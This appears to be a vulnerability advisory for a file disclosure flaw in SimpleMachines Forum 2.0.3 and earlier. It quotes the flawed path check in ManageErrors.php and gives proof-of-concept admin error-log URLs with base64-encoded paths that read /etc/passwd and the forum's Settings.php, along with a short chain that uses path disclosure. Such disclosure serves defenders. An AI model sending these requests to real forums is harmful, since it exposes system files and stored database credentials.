SimpleMachines Forum <= 2.0.3 File Disclosure

2013.01.07

Credit: WHK Yan

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

*Summary:*
--------------
A security flaw allows an attacker to know the full source file of the web system.

*Details:
-----------
Sources/ManageErrors.php Line 340:
// Make sure the file we are looking for is one they are allowed to look at
if (!is_readable($file) || (strpos($file, '../') !== false && ( strpos($file, $boarddir) === false || strpos($file, $sourcedir) === false)))
    fatal_lang_error('error_bad_file', true, array(htmlspecialchars($file)));

Bypass function strpos($file, '../'), no need "../", example: /home/foo/www/Settings.php

*PoC:
-------
http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q=
Read /etc/passwd

works with path disclosure for read Settings.php:
http://whk.drawcoders.net/index.php/topic,2792.0.html

*Reproduce:
1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
2. Get full path of web app ( /home/1337/public_html/SSI.php ).
3. Exploit in base64: 
http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA=
To read /home/spadmin/public_html/Settings.php

Referer and Mirror:
-------------------------
http://whk.drawcoders.net/index.php/topic,2805.0.html

References:

http://whk.drawcoders.net/index.php/topic,2805.0.html

http://whk.drawcoders.net/index.php/topic,2792.0.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SimpleMachines Forum <= 2.0.3 File Disclosure

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.